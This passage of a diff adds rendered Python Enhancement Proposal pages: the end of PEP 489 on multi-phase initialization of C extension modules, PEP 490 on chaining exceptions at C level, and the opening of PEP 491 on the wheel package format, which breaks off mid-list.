In the back, the shared library loader keeps a note of the fully qualified +module name of the last module that it loaded, and when a module gets +created that has a matching name, this global variable is used to determine +the fully qualified name of the module object. This is not entirely safe as it +relies on the module init function creating its own module object first, +but this assumption usually holds in practice.

+
+
+

The proposal

+

The initialization function (PyInit_modulename) will be allowed to return +a pointer to a PyModuleDef object. The import machinery will be in charge +of constructing the module object, calling hooks provided in the PyModuleDef +in the relevant phases of initialization (as described below).

+

This multi-phase initialization is an additional possibility. Single-phase +initialization, the current practice of returning a fully initialized module +object, will still be accepted, so existing code will work unchanged, +including binary compatibility.

+

The PyModuleDef structure will be changed to contain a list of slots, +similarly to PEP 384’s PyType_Spec for types. +To keep binary compatibility, and avoid needing to introduce a new structure +(which would introduce additional supporting functions and per-module storage), +the currently unused m_reload pointer of PyModuleDef will be changed to +hold the slots. The structures are defined as:

+
typedef struct {
+    int slot;
+    void *value;
+} PyModuleDef_Slot;
+
+typedef struct PyModuleDef {
+    PyModuleDef_Base m_base;
+    const char* m_name;
+    const char* m_doc;
+    Py_ssize_t m_size;
+    PyMethodDef *m_methods;
+    PyModuleDef_Slot *m_slots;  /* changed from `inquiry m_reload;` */
+    traverseproc m_traverse;
+    inquiry m_clear;
+    freefunc m_free;
+} PyModuleDef;
+
+
+

The m_slots member must be either NULL, or point to an array of +PyModuleDef_Slot structures, terminated by a slot with id set to 0 +(i.e. {0, NULL}).

+

To specify a slot, a unique slot ID must be provided. +New Python versions may introduce new slot IDs, but slot IDs will never be +recycled. Slots may get deprecated, but will continue to be supported +throughout Python 3.x.

+

A slot’s value pointer may not be NULL, unless specified otherwise in the +slot’s documentation.

+

The following slots are currently available, and described later:

+
    +
  • Py_mod_create
  • +
  • Py_mod_exec
  • +
+

Unknown slot IDs will cause the import to fail with SystemError.

+

When using multi-phase initialization, the m_name field of PyModuleDef will +not be used during importing; the module name will be taken from the ModuleSpec.

+

Before it is returned from PyInit_*, the PyModuleDef object must be initialized +using the newly added PyModuleDef_Init function. This sets the object type +(which cannot be done statically on certain compilers), refcount, and internal +bookkeeping data (m_index). +For example, an extension module “example” would be exported as:

+
static PyModuleDef example_def = {...}
+
+PyMODINIT_FUNC
+PyInit_example(void)
+{
+    return PyModuleDef_Init(&example_def);
+}
+
+
+

The PyModuleDef object must be available for the lifetime of the module created +from it – usually, it will be declared statically.

+
+

Pseudo-code Overview

+

Here is an overview of how the modified importers will operate. +Details such as logging or handling of errors and invalid states +are left out, and C code is presented with a concise Python-like syntax.

+

The framework that calls the importers is explained in +PEP 451.

+

importlib/_bootstrap.py:

+
+
class BuiltinImporter:
+    def create_module(self, spec):
+        module = _imp.create_builtin(spec)
+
+    def exec_module(self, module):
+        _imp.exec_dynamic(module)
+
+    def load_module(self, name):
+        # use a backwards compatibility shim
+        _load_module_shim(self, name)
+
+
+
+

importlib/_bootstrap_external.py:

+
+
class ExtensionFileLoader:
+    def create_module(self, spec):
+        module = _imp.create_dynamic(spec)
+
+    def exec_module(self, module):
+        _imp.exec_dynamic(module)
+
+    def load_module(self, name):
+        # use a backwards compatibility shim
+        _load_module_shim(self, name)
+
+
+
+

Python/import.c (the _imp module):

+
+
def create_dynamic(spec):
+    name = spec.name
+    path = spec.origin
+
+    # Find an already loaded module that used single-phase init.
+    # For multi-phase initialization, mod is NULL, so a new module
+    # is always created.
+    mod = _PyImport_FindExtensionObject(name, name)
+    if mod:
+        return mod
+
+    return _PyImport_LoadDynamicModuleWithSpec(spec)
+
+def exec_dynamic(module):
+    if not isinstance(module, types.ModuleType):
+        # non-modules are skipped -- PyModule_GetDef fails on them
+        return
+
+    def = PyModule_GetDef(module)
+    state = PyModule_GetState(module)
+    if state is NULL:
+        PyModule_ExecDef(module, def)
+
+def create_builtin(spec):
+    name = spec.name
+
+    # Find an already loaded module that used single-phase init.
+    # For multi-phase initialization, mod is NULL, so a new module
+    # is always created.
+    mod = _PyImport_FindExtensionObject(name, name)
+    if mod:
+        return mod
+
+    for initname, initfunc in PyImport_Inittab:
+        if name == initname:
+            m = initfunc()
+            if isinstance(m, PyModuleDef):
+                def = m
+                return PyModule_FromDefAndSpec(def, spec)
+            else:
+                # fall back to single-phase initialization
+                module = m
+                _PyImport_FixupExtensionObject(module, name, name)
+                return module
+
+
+
+

Python/importdl.c:

+
+
def _PyImport_LoadDynamicModuleWithSpec(spec):
+    path = spec.origin
+    package, dot, name = spec.name.rpartition('.')
+
+    # see the "Non-ASCII module names" section for export_hook_name
+    hook_name = export_hook_name(name)
+
+    # call platform-specific function for loading exported function
+    # from shared library
+    exportfunc = _find_shared_funcptr(hook_name, path)
+
+    m = exportfunc()
+    if isinstance(m, PyModuleDef):
+        def = m
+        return PyModule_FromDefAndSpec(def, spec)
+
+    module = m
+
+    # fall back to single-phase initialization
+    ....
+
+
+
+

Objects/moduleobject.c:

+
+
def PyModule_FromDefAndSpec(def, spec):
+    name = spec.name
+    create = None
+    for slot, value in def.m_slots:
+        if slot == Py_mod_create:
+            create = value
+    if create:
+        m = create(spec, def)
+    else:
+        m = PyModule_New(name)
+
+    if isinstance(m, types.ModuleType):
+        m.md_state = None
+        m.md_def = def
+
+    if def.m_methods:
+        PyModule_AddFunctions(m, def.m_methods)
+    if def.m_doc:
+        PyModule_SetDocString(m, def.m_doc)
+
+def PyModule_ExecDef(module, def):
+    if isinstance(module, types.module_type):
+        if module.md_state is NULL:
+            # allocate a block of zeroed-out memory
+            module.md_state = _alloc(module.md_size)
+
+    if def.m_slots is NULL:
+        return
+
+    for slot, value in def.m_slots:
+        if slot == Py_mod_exec:
+            value(module)
+
+
+
+
+
+

Module Creation Phase

+

Creation of the module object – that is, the implementation of +ExecutionLoader.create_module – is governed by the Py_mod_create slot.

+
+

The Py_mod_create slot

+

The Py_mod_create slot is used to support custom module subclasses. +The value pointer must point to a function with the following signature:

+
PyObject* (*PyModuleCreateFunction)(PyObject *spec, PyModuleDef *def)
+
+
+

The function receives a ModuleSpec instance, as defined in PEP 451, +and the PyModuleDef structure. +It should return a new module object, or set an error +and return NULL.

+

This function is not responsible for setting import-related attributes +specified in PEP 451 (such as __name__ or +__loader__) on the new module.

+

There is no requirement for the returned object to be an instance of +types.ModuleType. Any type can be used, as long as it supports setting and +getting attributes, including at least the import-related attributes. +However, only ModuleType instances support module-specific functionality +such as per-module state and processing of execution slots. +If something other than a ModuleType subclass is returned, no execution slots +may be defined; if any are, a SystemError is raised.

+

Note that when this function is called, the module’s entry in sys.modules +is not populated yet. Attempting to import the same module again +(possibly transitively), may lead to an infinite loop. +Extension authors are advised to keep Py_mod_create minimal, an in particular +to not call user code from it.

+

Multiple Py_mod_create slots may not be specified. If they are, import +will fail with SystemError.

+

If Py_mod_create is not specified, the import machinery will create a normal +module object using PyModule_New. The name is taken from spec.

+
+
+

Post-creation steps

+

If the Py_mod_create function returns an instance of types.ModuleType +or a subclass (or if a Py_mod_create slot is not present), the import +machinery will associate the PyModuleDef with the module. +This also makes the PyModuleDef accessible to execution phase, the +PyModule_GetDef function, and garbage collection routines (traverse, +clear, free).

+

If the Py_mod_create function does not return a module subclass, then m_size +must be 0, and m_traverse, m_clear and m_free must all be NULL. +Otherwise, SystemError is raised.

+

Additionally, initial attributes specified in the PyModuleDef are set on the +module object, regardless of its type:

+
    +
  • The docstring is set from m_doc, if non-NULL.
  • +
  • The module’s functions are initialized from m_methods, if any.
  • +
+
+
+
+

Module Execution Phase

+

Module execution – that is, the implementation of +ExecutionLoader.exec_module – is governed by “execution slots”. +This PEP only adds one, Py_mod_exec, but others may be added in the future.

+

The execution phase is done on the PyModuleDef associated with the module +object. For objects that are not a subclass of PyModule_Type (for which +PyModule_GetDef would fail), the execution phase is skipped.

+

Execution slots may be specified multiple times, and are processed in the order +they appear in the slots array. +When using the default import machinery, they are processed after +import-related attributes specified in PEP 451 +(such as __name__ or __loader__) are set and the module is added +to sys.modules.

+
+

Pre-Execution steps

+

Before processing the execution slots, per-module state is allocated for the +module. From this point on, per-module state is accessible through +PyModule_GetState.

+
+
+

The Py_mod_exec slot

+

The entry in this slot must point to a function with the following signature:

+
int (*PyModuleExecFunction)(PyObject* module)
+
+
+

It will be called to initialize a module. Usually, this amounts to +setting the module’s initial attributes. +The “module” argument receives the module object to initialize.

+

The function must return 0 on success, or, on error, set an exception and +return -1.

+

If PyModuleExec replaces the module’s entry in sys.modules, the new object +will be used and returned by importlib machinery after all execution slots +are processed. This is a feature of the import machinery itself. +The slots themselves are all processed using the module returned from the +creation phase; sys.modules is not consulted during the execution phase. +(Note that for extension modules, implementing Py_mod_create is usually +a better solution for using custom module objects.)

+
+
+
+

Legacy Init

+

The backwards-compatible single-phase initialization continues to be supported. +In this scheme, the PyInit function returns a fully initialized module rather +than a PyModuleDef object. +In this case, the PyInit hook implements the creation phase, and the execution +phase is a no-op.

+

Modules that need to work unchanged on older versions of Python should stick to +single-phase initialization, because the benefits it brings can’t be +back-ported. +Here is an example of a module that supports multi-phase initialization, +and falls back to single-phase when compiled for an older version of CPython. +It is included mainly as an illustration of the changes needed to enable +multi-phase init:

+
#include <Python.h>
+
+static int spam_exec(PyObject *module) {
+    PyModule_AddStringConstant(module, "food", "spam");
+    return 0;
+}
+
+#ifdef Py_mod_exec
+static PyModuleDef_Slot spam_slots[] = {
+    {Py_mod_exec, spam_exec},
+    {0, NULL}
+};
+#endif
+
+static PyModuleDef spam_def = {
+    PyModuleDef_HEAD_INIT,                      /* m_base */
+    "spam",                                     /* m_name */
+    PyDoc_STR("Utilities for cooking spam"),    /* m_doc */
+    0,                                          /* m_size */
+    NULL,                                       /* m_methods */
+#ifdef Py_mod_exec
+    spam_slots,                                 /* m_slots */
+#else
+    NULL,
+#endif
+    NULL,                                       /* m_traverse */
+    NULL,                                       /* m_clear */
+    NULL,                                       /* m_free */
+};
+
+PyMODINIT_FUNC
+PyInit_spam(void) {
+#ifdef Py_mod_exec
+    return PyModuleDef_Init(&spam_def);
+#else
+    PyObject *module;
+    module = PyModule_Create(&spam_def);
+    if (module == NULL) return NULL;
+    if (spam_exec(module) != 0) {
+        Py_DECREF(module);
+        return NULL;
+    }
+    return module;
+#endif
+}
+
+
+
+
+

Built-In modules

+

Any extension module can be used as a built-in module by linking it into +the executable, and including it in the inittab (either at runtime with +PyImport_AppendInittab, or at configuration time, using tools like freeze).

+

To keep this possibility, all changes to extension module loading introduced +in this PEP will also apply to built-in modules. +The only exception is non-ASCII module names, explained below.

+
+
+

Subinterpreters and Interpreter Reloading

+

Extensions using the new initialization scheme are expected to support +subinterpreters and multiple Py_Initialize/Py_Finalize cycles correctly, +avoiding the issues mentioned in Python documentation [6]. +The mechanism is designed to make this easy, but care is still required +on the part of the extension author. +No user-defined functions, methods, or instances may leak to different +interpreters. +To achieve this, all module-level state should be kept in either the module +dict, or in the module object’s storage reachable by PyModule_GetState. +A simple rule of thumb is: Do not define any static data, except built-in types +with no mutable or user-settable class attributes.

+
+
+

Functions incompatible with multi-phase initialization

+

The PyModule_Create function will fail when used on a PyModuleDef structure +with a non-NULL m_slots pointer. +The function doesn’t have access to the ModuleSpec object necessary for +multi-phase initialization.

+

The PyState_FindModule function will return NULL, and PyState_AddModule +and PyState_RemoveModule will also fail on modules with non-NULL m_slots. +PyState registration is disabled because multiple module objects may be created +from the same PyModuleDef.

+
+
+

Module state and C-level callbacks

+

Due to the unavailability of PyState_FindModule, any function that needs access +to module-level state (including functions, classes or exceptions defined at +the module level) must receive a reference to the module object (or the +particular object it needs), either directly or indirectly. +This is currently difficult in two situations:

+
    +
  • Methods of classes, which receive a reference to the class, but not to +the class’s module
  • +
  • Libraries with C-level callbacks, unless the callbacks can receive custom +data set at callback registration
  • +
+

Fixing these cases is outside of the scope of this PEP, but will be needed for +the new mechanism to be useful to all modules. Proper fixes have been discussed +on the import-sig mailing list [5].

+

As a rule of thumb, modules that rely on PyState_FindModule are, at the moment, +not good candidates for porting to the new mechanism.

+
+
+

New Functions

+

A new function and macro implementing the module creation phase will be added. +These are similar to PyModule_Create and PyModule_Create2, except they +take an additional ModuleSpec argument, and handle module definitions with +non-NULL slots:

+
PyObject * PyModule_FromDefAndSpec(PyModuleDef *def, PyObject *spec)
+PyObject * PyModule_FromDefAndSpec2(PyModuleDef *def, PyObject *spec,
+                                    int module_api_version)
+
+
+

A new function implementing the module execution phase will be added. +This allocates per-module state (if not allocated already), and always +processes execution slots. The import machinery calls this method when +a module is executed, unless the module is being reloaded:

+
PyAPI_FUNC(int) PyModule_ExecDef(PyObject *module, PyModuleDef *def)
+
+
+

Another function will be introduced to initialize a PyModuleDef object. +This idempotent function fills in the type, refcount, and module index. +It returns its argument cast to PyObject*, so it can be returned directly +from a PyInit function:

+
PyObject * PyModuleDef_Init(PyModuleDef *);
+
+
+

Additionally, two helpers will be added for setting the docstring and +methods on a module:

+
int PyModule_SetDocString(PyObject *, const char *)
+int PyModule_AddFunctions(PyObject *, PyMethodDef *)
+
+
+
+
+

Export Hook Name

+

As portable C identifiers are limited to ASCII, module names +must be encoded to form the PyInit hook name.

+

For ASCII module names, the import hook is named +PyInit_<modulename>, where <modulename> is the name of the module.

+

For module names containing non-ASCII characters, the import hook is named +PyInitU_<encodedname>, where the name is encoded using CPython’s +“punycode” encoding (Punycode with a lowercase suffix), +with hyphens (“-”) replaced by underscores (“_”).

+

In Python:

+
def export_hook_name(name):
+    try:
+        suffix = b'_' + name.encode('ascii')
+    except UnicodeEncodeError:
+        suffix = b'U_' + name.encode('punycode').replace(b'-', b'_')
+    return b'PyInit' + suffix
+
+
+

Examples:

+ + + + + + + + + + + + + + + + + +
Module nameInit hook name
spamPyInit_spam
lančmítPyInitU_lanmt_2sa6t
スパムPyInitU_zck5b2b
+

For modules with non-ASCII names, single-phase initialization is not supported.

+

In the initial implementation of this PEP, built-in modules with non-ASCII +names will not be supported.

+
+
+

Module Reloading

+

Reloading an extension module using importlib.reload() will continue to +have no effect, except re-setting import-related attributes.

+

Due to limitations in shared library loading (both dlopen on POSIX and +LoadModuleEx on Windows), it is not generally possible to load +a modified library after it has changed on disk.

+

Use cases for reloading other than trying out a new version of the module +are too rare to require all module authors to keep reloading in mind. +If reload-like functionality is needed, authors can export a dedicated +function for it.

+
+
+

Multiple modules in one library

+

To support multiple Python modules in one shared library, the library can +export additional PyInit* symbols besides the one that corresponds +to the library’s filename.

+

Note that this mechanism can currently only be used to load extra modules, +but not to find them. (This is a limitation of the loader mechanism, +which this PEP does not try to modify.) +To work around the lack of a suitable finder, code like the following +can be used:

+
import importlib.machinery
+import importlib.util
+loader = importlib.machinery.ExtensionFileLoader(name, path)
+spec = importlib.util.spec_from_loader(name, loader)
+module = importlib.util.module_from_spec(spec)
+loader.exec_module(module)
+return module
+
+
+

On platforms that support symbolic links, these may be used to install one +library under multiple names, exposing all exported modules to normal +import machinery.

+
+
+

Testing and initial implementations

+

For testing, a new built-in module _testmultiphase will be created. +The library will export several additional modules using the mechanism +described in “Multiple modules in one library”.

+

The _testcapi module will be unchanged, and will use single-phase +initialization indefinitely (or until it is no longer supported).

+

The array and xx* modules will be converted to use multi-phase +initialization as part of the initial implementation.

+
+
+
+

Summary of API Changes and Additions

+

New functions:

+
    +
  • PyModule_FromDefAndSpec (macro)
  • +
  • PyModule_FromDefAndSpec2
  • +
  • PyModule_ExecDef
  • +
  • PyModule_SetDocString
  • +
  • PyModule_AddFunctions
  • +
  • PyModuleDef_Init
  • +
+

New macros:

+
    +
  • Py_mod_create
  • +
  • Py_mod_exec
  • +
+

New types:

+
    +
  • PyModuleDef_Type will be exposed
  • +
+

New structures:

+
    +
  • PyModuleDef_Slot
  • +
+

Other changes:

+

PyModuleDef.m_reload changes to PyModuleDef.m_slots.

+

BuiltinImporter and ExtensionFileLoader will now implement +create_module and exec_module.

+

The internal _imp module will have backwards incompatible changes: +create_builtin, create_dynamic, and exec_dynamic will be added; +init_builtin, load_dynamic will be removed.

+

The undocumented functions imp.load_dynamic and imp.init_builtin will +be replaced by backwards-compatible shims.

+
+

Backwards Compatibility

+

Existing modules will continue to be source- and binary-compatible with new +versions of Python. +Modules that use multi-phase initialization will not be compatible with +versions of Python that do not implement this PEP.

+

The functions init_builtin and load_dynamic will be removed from +the _imp module (but not from the imp module).

+

All changed loaders (BuiltinImporter and ExtensionFileLoader) will +remain backwards-compatible; the load_module method will be replaced by +a shim.

+

Internal functions of Python/import.c and Python/importdl.c will be removed. +(Specifically, these are _PyImport_GetDynLoadFunc, +_PyImport_GetDynLoadWindows, and _PyImport_LoadDynamicModule.)

+
+
+
+

Possible Future Extensions

+

The slots mechanism, inspired by PyType_Slot from PEP 384, +allows later extensions.

+

Some extension modules exports many constants; for example _ssl has +a long list of calls in the form:

+
PyModule_AddIntConstant(m, "SSL_ERROR_ZERO_RETURN",
+                        PY_SSL_ERROR_ZERO_RETURN);
+
+
+

Converting this to a declarative list, similar to PyMethodDef, +would reduce boilerplate, and provide free error-checking which +is often missing.

+

String constants and types can be handled similarly. +(Note that non-default bases for types cannot be portably specified +statically; this case would need a Py_mod_exec function that runs +before the slots are added. The free error-checking would still be +beneficial, though.)

+

Another possibility is providing a “main” function that would be run +when the module is given to Python’s -m switch. +For this to work, the runpy module will need to be modified to take +advantage of ModuleSpec-based loading introduced in PEP 451. +Also, it will be necessary to add a mechanism for setting up a module +according to slots it wasn’t originally defined with.

+
+
+

Implementation

+

Work-in-progress implementation is available in a Github repository [3]; +a patchset is at [4].

+
+
+

Previous Approaches

+

Stefan Behnel’s initial proto-PEP [1] +had a “PyInit_modulename” hook that would create a module class, +whose __init__ would be then called to create the module. +This proposal did not correspond to the (then nonexistent) PEP 451, +where module creation and initialization is broken into distinct steps. +It also did not support loading an extension into pre-existing module objects.

+

Alyssa (Nick) Coghlan proposed “Create” and “Exec” hooks, and wrote a prototype +implementation [2]. +At this time PEP 451 was still not implemented, so the prototype +does not use ModuleSpec.

+

The original version of this PEP used Create and Exec hooks, and allowed +loading into arbitrary pre-constructed objects with Exec hook. +The proposal made extension module initialization closer to how Python modules +are initialized, but it was later recognized that this isn’t an important goal. +The current PEP describes a simpler solution.

+

A further iteration used a “PyModuleExport” hook as an alternative to PyInit, +where PyInit was used for existing scheme, and PyModuleExport for multi-phase. +However, not being able to determine the hook name based on module name +complicated automatic generation of PyImport_Inittab by tools like freeze. +Keeping only the PyInit hook name, even if it’s not entirely appropriate for +exporting a definition, yielded a much simpler solution.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0489.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0490/index.html b/pep-0490/index.html new file mode 100644 index 00000000000..b47580a60f6 --- /dev/null +++ b/pep-0490/index.html @@ -0,0 +1,427 @@ + + + + + + + + PEP 490 – Chain exceptions at C level | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 490 – Chain exceptions at C level

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
25-Mar-2015
+
Python-Version:
+
3.6
+
+
+
+
Table of Contents +
+
+

Abstract

+

Chain exceptions at C level, as already done at Python level.

+
+
+

Rationale

+

Python 3 introduced a new killer feature: exceptions are chained by +default, PEP 3134.

+

Example:

+
try:
+    raise TypeError("err1")
+except TypeError:
+    raise ValueError("err2")
+
+
+

Output:

+
Traceback (most recent call last):
+  File "test.py", line 2, in <module>
+    raise TypeError("err1")
+TypeError: err1
+
+During handling of the above exception, another exception occurred:
+
+Traceback (most recent call last):
+  File "test.py", line 4, in <module>
+    raise ValueError("err2")
+ValueError: err2
+
+
+

Exceptions are chained by default in Python code, but not in +extensions written in C.

+

A new private _PyErr_ChainExceptions() function was introduced in +Python 3.4.3 and 3.5 to chain exceptions. Currently, it must be called +explicitly to chain exceptions and its usage is not trivial.

+

Example of _PyErr_ChainExceptions() usage from the zipimport +module to chain the previous OSError to a new ZipImportError +exception:

+
PyObject *exc, *val, *tb;
+PyErr_Fetch(&exc, &val, &tb);
+PyErr_Format(ZipImportError, "can't open Zip file: %R", archive);
+_PyErr_ChainExceptions(exc, val, tb);
+
+
+

This PEP proposes to also chain exceptions automatically at C level to +stay consistent and give more information on failures to help +debugging. The previous example becomes simply:

+
PyErr_Format(ZipImportError, "can't open Zip file: %R", archive);
+
+
+
+
+

Proposal

+
+

Modify PyErr_*() functions to chain exceptions

+

Modify C functions raising exceptions of the Python C API to +automatically chain exceptions: modify PyErr_SetString(), +PyErr_Format(), PyErr_SetNone(), etc.

+
+
+

Modify functions to not chain exceptions

+

Keeping the previous exception is not always interesting when the new +exception contains information of the previous exception or even more +information, especially when the two exceptions have the same type.

+

Example of an useless exception chain with int(str):

+
TypeError: a bytes-like object is required, not 'type'
+
+During handling of the above exception, another exception occurred:
+
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: int() argument must be a string, a bytes-like object or a number, not 'type'
+
+
+

The new TypeError exception contains more information than the +previous exception. The previous exception should be hidden.

+

The PyErr_Clear() function can be called to clear the current +exception before raising a new exception, to not chain the current +exception with a new exception.

+
+
+

Modify functions to chain exceptions

+

Some functions save and then restore the current exception. If a new +exception is raised, the exception is currently displayed into +sys.stderr or ignored depending on the function. Some of these +functions should be modified to chain exceptions instead.

+

Examples of function ignoring the new exception(s):

+
    +
  • ptrace_enter_call(): ignore exception
  • +
  • subprocess_fork_exec(): ignore exception raised by enable_gc()
  • +
  • t_bootstrap() of the _thread module: ignore exception raised +by trying to display the bootstrap function to sys.stderr
  • +
  • PyDict_GetItem(), _PyDict_GetItem_KnownHash(): ignore +exception raised by looking for a key in the dictionary
  • +
  • _PyErr_TrySetFromCause(): ignore exception
  • +
  • PyFrame_LocalsToFast(): ignore exception raised by +dict_to_map()
  • +
  • _PyObject_Dump(): ignore exception. _PyObject_Dump() is used +to debug, to inspect a running process, it should not modify the +Python state.
  • +
  • Py_ReprLeave(): ignore exception “because there is no way to +report them”
  • +
  • type_dealloc(): ignore exception raised by +remove_all_subclasses()
  • +
  • PyObject_ClearWeakRefs(): ignore exception?
  • +
  • call_exc_trace(), call_trace_protected(): ignore exception
  • +
  • remove_importlib_frames(): ignore exception
  • +
  • do_mktuple(), helper used by Py_BuildValue() for example: +ignore exception?
  • +
  • flush_io(): ignore exception
  • +
  • sys_write(), sys_format(): ignore exception
  • +
  • _PyTraceback_Add(): ignore exception
  • +
  • PyTraceBack_Print(): ignore exception
  • +
+

Examples of function displaying the new exception to sys.stderr:

+
    +
  • atexit_callfuncs(): display exceptions with +PyErr_Display() and return the latest exception, the function +calls multiple callbacks and only returns the latest exception
  • +
  • sock_dealloc(): log the ResourceWarning exception with +PyErr_WriteUnraisable()
  • +
  • slot_tp_del(): display exception with +PyErr_WriteUnraisable()
  • +
  • _PyGen_Finalize(): display gen_close() exception with +PyErr_WriteUnraisable()
  • +
  • slot_tp_finalize(): display exception raised by the +__del__() method with PyErr_WriteUnraisable()
  • +
  • PyErr_GivenExceptionMatches(): display exception raised by +PyType_IsSubtype() with PyErr_WriteUnraisable()
  • +
+
+
+
+

Backward compatibility

+

A side effect of chaining exceptions is that exceptions store +traceback objects which store frame objects which store local +variables. Local variables are kept alive by exceptions. A common +issue is a reference cycle between local variables and exceptions: an +exception is stored in a local variable and the frame indirectly +stored in the exception. The cycle only impacts applications storing +exceptions.

+

The reference cycle can now be fixed with the new +traceback.TracebackException object introduced in Python 3.5. It +stores information required to format a full textual traceback without +storing local variables.

+

The asyncio is impacted by the reference cycle issue. This module +is also maintained outside Python standard library to release a +version for Python 3.3. traceback.TracebackException will maybe +be backported in a private asyncio module to fix reference cycle +issues.

+
+
+

Alternatives

+
+

No change

+

A new private _PyErr_ChainExceptions() function is enough to chain +manually exceptions.

+

Exceptions will only be chained explicitly where it makes sense.

+
+
+

New helpers to chain exceptions

+

Functions like PyErr_SetString() don’t chain automatically +exceptions. To make the usage of _PyErr_ChainExceptions() easier, +new private functions are added:

+
    +
  • _PyErr_SetStringChain(exc_type, message)
  • +
  • _PyErr_FormatChain(exc_type, format, ...)
  • +
  • _PyErr_SetNoneChain(exc_type)
  • +
  • _PyErr_SetObjectChain(exc_type, exc_value)
  • +
+

Helper functions to raise specific exceptions like +_PyErr_SetKeyError(key) or PyErr_SetImportError(message, name, +path) don’t chain exceptions. The generic +_PyErr_ChainExceptions(exc_type, exc_value, exc_tb) should be used +to chain exceptions with these helper functions.

+
+
+
+

Appendix

+
+

PEPs

+
    +
  • PEP 3134 – Exception Chaining and Embedded Tracebacks +(Python 3.0): +new __context__ and __cause__ attributes for exceptions
  • +
  • PEP 415 – Implement context suppression with exception attributes +(Python 3.3): +raise exc from None
  • +
  • PEP 409 – Suppressing exception context +(superseded by the PEP 415)
  • +
+
+
+

Python C API

+

The header file Include/pyerror.h declares functions related to +exceptions.

+

Functions raising exceptions:

+
    +
  • PyErr_SetNone(exc_type)
  • +
  • PyErr_SetObject(exc_type, exc_value)
  • +
  • PyErr_SetString(exc_type, message)
  • +
  • PyErr_Format(exc, format, ...)
  • +
+

Helpers to raise specific exceptions:

+
    +
  • PyErr_BadArgument()
  • +
  • PyErr_BadInternalCall()
  • +
  • PyErr_NoMemory()
  • +
  • PyErr_SetFromErrno(exc)
  • +
  • PyErr_SetFromWindowsErr(err)
  • +
  • PyErr_SetImportError(message, name, path)
  • +
  • _PyErr_SetKeyError(key)
  • +
  • _PyErr_TrySetFromCause(prefix_format, ...)
  • +
+

Manage the current exception:

+
    +
  • PyErr_Clear(): clear the current exception, +like except: pass
  • +
  • PyErr_Fetch(exc_type, exc_value, exc_tb)
  • +
  • PyErr_Restore(exc_type, exc_value, exc_tb)
  • +
  • PyErr_GetExcInfo(exc_type, exc_value, exc_tb)
  • +
  • PyErr_SetExcInfo(exc_type, exc_value, exc_tb)
  • +
+

Others function to handle exceptions:

+
    +
  • PyErr_ExceptionMatches(exc): check to implement +except exc:  ...
  • +
  • PyErr_GivenExceptionMatches(exc1, exc2)
  • +
  • PyErr_NormalizeException(exc_type, exc_value, exc_tb)
  • +
  • _PyErr_ChainExceptions(exc_type, exc_value, exc_tb)
  • +
+
+
+

Python Issues

+

Chain exceptions:

+ +

Changes preventing to loose exceptions:

+ +
+
+
+

Rejection

+

The PEP was rejected on 2017-09-12 by Victor Stinner. It was decided in +the python-dev discussion to not chain C exceptions by default, but +instead chain them explicitly only where it makes sense.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0490.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0491/index.html b/pep-0491/index.html new file mode 100644 index 00000000000..a1d4b34b434 --- /dev/null +++ b/pep-0491/index.html @@ -0,0 +1,682 @@ + + + + + + + + PEP 491 – The Wheel Binary Package Format 1.9 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 491 – The Wheel Binary Package Format 1.9

+
+
Author:
+
Daniel Holth <dholth at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
16-Apr-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes the second version of a built-package format for Python +called “wheel”. Wheel provides a Python-specific, relocatable package format +that allows people to install software more quickly and predictably than +re-building from source each time.

+

A wheel is a ZIP-format archive with a specially formatted file name and +the .whl extension. It contains a single distribution nearly as it +would be installed according to PEP 376 with a particular installation +scheme. Simple wheels can be unpacked onto sys.path and used directly +but wheels are usually installed with a specialized installer.

+

This version of the wheel specification adds support for installing +distributions into many different directories, and adds a way to find +those files after they have been installed.

+
+
+

PEP Deferral

+

This PEP is not currently being actively pursued, with Python packaging +improvements currently focusing on the package build process rather than +expanding the binary archive format to cover additional use cases.

+

Some specific elements to be addressed when work on this PEP is resumed in the +future:

+
    +
  • migrating the official wheel format definition to +https://packaging.python.org/specifications/ (similar to what PEP 566 did for +https://packaging.python.org/specifications/core-metadata/)
  • +
  • updating the PEP itself to focus on the changes being made between the +two versions of the format and the rationale for those changes, rather than +having to repeat all the information that is unchanged from PEP 427
  • +
  • clarifying that the PEP is deliberately written to allow existing installers +to be compliant with the specification when using existing install scheme +definitions, while also allowing the creation of new install scheme +definitions that take advantage of the richer categorisation scheme for +the contents of the binary archive
  • +
+
+
+

Rationale

+

Wheel 1.0 is best at installing files into site-packages and a few +other locations specified by distutils, but users would like to install +files from single distribution into many directories – perhaps separate +locations for docs, data, and code. Unfortunately not everyone agrees +on where these install locations should be relative to the root directory. +This version of the format adds many more categories, each of which can be +installed to a different destination based on policy. Since it might +also be important to locate the installed files at runtime, this version +of the format also adds a way to record the installed paths in a way that +can be read by the installed software.

+
+
+

Details

+
+

Installing a wheel ‘distribution-1.0-py32-none-any.whl’

+

Wheel installation notionally consists of two phases:

+
    +
  • Unpack.
      +
    1. Parse distribution-1.0.dist-info/WHEEL.
    2. +
    3. Check that installer is compatible with Wheel-Version. Warn if +minor version is greater, abort if major version is greater.
    4. +
    5. If Root-Is-Purelib == ‘true’, unpack archive into purelib +(site-packages).
    6. +
    7. Else unpack archive into platlib (site-packages).
    8. +
    +
  • +
  • Spread.
      +
    1. Unpacked archive includes distribution-1.0.dist-info/ and (if +there is data) distribution-1.0.data/.
    2. +
